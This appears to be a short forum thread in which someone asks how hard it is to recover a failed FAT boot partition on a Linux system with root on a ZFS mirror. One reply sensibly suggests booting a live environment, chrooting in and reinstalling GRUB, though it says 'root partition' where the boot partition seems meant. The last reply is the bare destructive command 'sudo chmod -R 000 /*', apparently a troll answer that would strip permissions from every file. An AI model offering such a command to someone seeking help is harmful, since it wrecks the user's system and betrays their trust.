Root on Linux flaw?

With a Root system on ZFS mirror... if the drive with boot partition fails, how difficult is it to recover/reinstall it to be able to boot again?

EDIT: Forgot to mention, the boot partition is forced to be FAT so not able to be restored by ZFS

It depends on the distro but generally it's not too hard, assuming the root partition is not damaged. If it is damaged, you'll need to recover that before you can fix your boot partition.

If only the root partition is damaged you can boot off of a live environment and chroot into your root partition, then reinstall grub or whatever from there.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
